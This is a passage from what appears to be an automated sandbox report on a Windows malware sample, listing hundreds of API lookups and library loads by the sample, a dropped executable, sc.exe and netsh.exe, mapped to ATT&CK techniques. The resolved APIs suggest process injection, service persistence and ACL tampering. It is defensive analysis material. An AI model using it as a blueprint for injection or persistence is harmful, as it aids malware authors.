(UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00006096)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005856)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00005856)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00005700)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e546b@ADVAPI32.dll\"\n \"0e000f00703f546b@ADVAPI32.dll\"\n \"0e000f00cc3f546b@ADVAPI32.dll\"\n \"11001200b447546b@ADVAPI32.dll\"\n \"110012004848546b@ADVAPI32.dll\"\n \"120013008c48546b@ADVAPI32.dll\"\n \"12001300e448546b@ADVAPI32.dll\"\n \"14001500906e546b@ADVAPI32.dll\"\n \"14001500a86e546b@ADVAPI32.dll\"\n \"14001500c06e546b@ADVAPI32.dll\"\n \"17001800d86e546b@ADVAPI32.dll\"\n \"0d000e00f06e546b@ADVAPI32.dll\"\n \"11001200006f546b@ADVAPI32.dll\"\n \"11001200146f546b@ADVAPI32.dll\"\n \"0f0010005470546b@ADVAPI32.dll\"\n \"140015009470546b@ADVAPI32.dll\"\n \"14001500ac70546b@ADVAPI32.dll\"\n \"0c000d00f470546b@ADVAPI32.dll\"\n \"0c000d000471546b@ADVAPI32.dll\"\n \"0e000f001471546b@ADVAPI32.dll\"\n \"0e000f002471546b@ADVAPI32.dll\"\n \"0b000c003471546b@ADVAPI32.dll\"\n \"180019006c73546b@RPCRT4.dll\"\n \"130014009873546b@RPCRT4.dll\"\n \"14001500ac73546b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005184)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005780)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005912)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005912)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005912)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005912)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005912)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005912)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006096)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005856)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005856)\n 